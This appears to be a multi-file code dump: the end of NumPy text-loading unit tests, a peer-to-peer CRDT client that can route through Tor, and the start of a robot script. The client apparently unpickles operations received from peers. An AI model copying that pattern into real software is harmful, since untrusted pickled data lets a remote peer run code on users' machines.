data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2,3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
p2p_client.py
|
import logging
import pickle
import socket
import struct
import threading
from time import perf_counter
import socks
from crdt.ops import RemoteOp
from crdt.vector_clock import VectorClock
from network.network_client import NetworkClient, pack_and_send, recvall
from tools.connected_peers import ConnectedPeers
from tools.operation_queue import OperationQueue
from tools.operation_store import OperationStore
class CRDTP2PClient(NetworkClient):
def __init__(
self, port, op_q: OperationQueue, can_consume_sem,
puid, seen_ops_vc: VectorClock, stored_ops: OperationStore,
encrypt, known_peers, my_addr, use_tor):
super(CRDTP2PClient, self).__init__(seen_ops_vc, stored_ops, puid, encrypt)
self.connected_peers = ConnectedPeers()
self.connecting_peers = ConnectedPeers()
self.port = port
self.op_q = op_q
self.can_consume_sem = can_consume_sem
self.known_peers = known_peers
self.seen_ops_vc = seen_ops_vc
self.stored_ops = stored_ops
self.running = False
self.my_addr = my_addr
self.filename = puid
if use_tor:
socks.set_default_proxy(socks.SOCKS5, "localhost", port=9050)
self.use_tor = use_tor
self.add_peer_lock = threading.RLock()
self.time_file = '{}recv'.format(puid)
def remove_peer(self, ip, sock):
"""
Close connection to peer and note that no longer connected
"""
try:
# Send something so that the listening thread gets woken up and can close
pack_and_send('\x00', sock)
sock.close()
logging.debug('closed socket for {}'.format(ip))
except socket.error:
pass
self.connected_peers.remove_peer(ip)
def send_op(self, unpickled_op):
"""
Send operation to all connected peers
:param unpickled_op: the operation to send
"""
peers_to_remove = []
for peer_ip, peer_info in self.connected_peers.iterate():
try:
pack_and_send(unpickled_op, peer_info['sock'], peer_info['cipher'])
except socket.error:
# If fail to send, assume disconnected
logging.debug('error sending to {}, going to remove'.format(peer_ip))
peers_to_remove.append((peer_ip, peer_info['sock']))
for ip, sock in peers_to_remove:
self.remove_peer(ip, sock)
def do_p2p_protocol(self, sock, peer_ip, encrypt):
"""
(Generate key) and synchronise operations with the new peer
"""
cipher = None
try:
if encrypt:
# The application's encryption flag is set
# Returns object with encrypt()/decrypt() methods
cipher = self.do_DH(sock)
# synchronise operations
# Send your vector clock to them
self.sync_ops_req(sock, cipher)
# Receive their vector clock
# Work out set difference of yours - theirs
# Send those operations
self.sync_ops(sock, cipher)
# Note that we're connected to this peer
# And no longer in the process of connecting
self.connected_peers.add_peer(peer_ip, sock, cipher)
self.connecting_peers.remove_peer(peer_ip)
except socket.error as e:
# Communication failure, so stop trying and connect to the next peer
self.connecting_peers.remove_peer(peer_ip)
return
# Start listening for operations from this new peer
op_thread = threading.Thread(target=self.listen_for_ops,
args=(peer_ip, sock, cipher))
op_thread.daemon = True
op_thread.start()
def disconnect(self):
"""
Close connections to all peers.
Then make quick connection to self to stop listening for incoming connections
"""
logging.debug('disconnecting')
# MEASUREMENT
self.can_consume_sem.acquire()
for ip, val in self.connected_peers.iterate():
logging.debug('removing peer {}'.format(ip))
self.remove_peer(ip, val['sock'])
# force listening socket to close as well
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
s.connect(("localhost", self.port))
self.running = False
s.close()
self.recvsock.close()
self.can_consume_sem.release()
def connect(self):
"""
Connect to all known addresses
"""
logging.debug('connecting')
# Force the app to stop applying operations until done connecting
self.can_consume_sem.acquire()
self.running = True
encrypt = self.encrypt
use_tor = self.use_tor
# start listening for other peers connecting
listen_thread = threading.Thread(target=self.listen_for_peers, args=(self.port, encrypt))
listen_thread.daemon = True
listen_thread.start()
for peer_addr in self.known_peers:
try:
logging.debug('trying to connect to {} out of {}'.format(peer_addr, self.known_peers))
self.add_peer_lock.acquire()
if self.connected_peers.contains(peer_addr) or (
self.connecting_peers.contains(peer_addr)):
logging.debug('already connected to {}'.format(peer_addr))
continue
if use_tor:
sock = socks.socksocket()
logging.debug('connecting to {} over Tor'.format(peer_addr + '.onion'))
sock.connect((peer_addr + '.onion', self.port))
else:
sock = socket.socket()
sock.connect((peer_addr, self.port))
logging.debug('connected to {}'.format(peer_addr))
pack_and_send(self.my_addr, sock)
self.connecting_peers.add_peer(peer_addr, sock)
except (socket.error, struct.error, socks.SOCKS5Error) as e:
logging.warning('couldn\'t connect to {}, {}'.format(peer_addr, e))
continue
finally:
self.add_peer_lock.release()
# logging.debug('released add peer lock')
self.do_p2p_protocol(sock, peer_addr, encrypt)
# MEASUREMENT
# op_thread = threading.Thread(target=self.listen_for_ops, args=(peer_addr, sock, None))
# op_thread.daemon = True
# op_thread.start()
# LENGTH_MEASUREMENT
# self.sync_ops(sock, None)
# break
# listen_thread.join()
self.can_consume_sem.release()
def listen_for_peers(self, port, encrypt):
"""
Start listening for incoming peer connections
:param port: the port to listen on
:param encrypt: Boolean whether or not to encrypt communication
"""
self.recvsock = socket.socket()
self.recvsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.recvsock.bind(('', port))
self.recvsock.listen(100)
logging.info('listening for peers on port {}'.format(port))
while self.running:
try:
logging.debug('in listening loop')
sock, _ = self.recvsock.accept()
peer_addr = recvall(sock)
logging.info('peer connected from {}'.format(peer_addr))
except (socket.error, struct.error) as e:
logging.warning('couldn\'t connect to peer, {}'.format(e))
continue
self.add_peer_lock.acquire()
if (self.connected_peers.contains(peer_addr) or (
self.connecting_peers.contains(peer_addr))) and (
peer_addr > self.my_addr
):
logging.debug('already connected to {}, dropping'.format(peer_addr))
self.add_peer_lock.release()
sock.close()
continue
self.connecting_peers.add_peer(peer_addr, sock)
self.add_peer_lock.release()
# LENGTH MEASUREMENT
self.do_p2p_protocol(sock, peer_addr, encrypt)
# self.sync_ops_req(sock, None)
# self.listen_for_ops(peer_addr, sock, None)
# return
def listen_for_ops(self, peer_ip, sock, cipher):
"""
Start receiving operations
:param peer_ip: the address to receive from
:param sock: the socket to receive on
:param cipher: the crypto object
"""
ops_done = 0
with open(self.time_file, 'w+') as f:
while True:
try:
op = recvall(sock, cipher)
logging.debug('{} got op {}'.format(self.puid, op))
f.write('{}\n'.format(perf_counter()))
ops_done += 1
if not isinstance(op, RemoteOp):
logging.warning('op {} was garbled, disconnecting from {}'.format(
op, peer_ip
))
raise socket.error('Garbled operation')
# Note that we've received this
if not (self.seen_ops_vc < op.vertex_id):
# We have seen the vertex this operation references
# TODO: for lseq ids the comparison should look at timestamp first instead of postition
self.seen_ops_vc.update(op)
logging.debug('vc {}'.format(self.seen_ops_vc))
# add to the operation queue and signal something has been added
# MEASUREMENT
self.op_q.appendleft(op)
# MEASUREMENT
# if ops_done >= 100:
# print('finished')
# f.flush()
# self.disconnect()
# return
except (socket.error, pickle.UnpicklingError, IndexError, ValueError) as e:
logging.warning('Failed to receive op from {} {}'.format(peer_ip, e))
self.remove_peer(peer_ip, sock)
return
|
pinobot.py
|
#!/usr/bin/python3
from modules.pino_boot_loader import PinoBootLoader
import time , threading, logging
from logging.handlers import RotatingFileHandler
from enum import Enum
from google.api_core.exceptions import Unknown
class PinoState(Enum):
IDLE = 0
SENSOR_ON =1
STILL_ON = 2
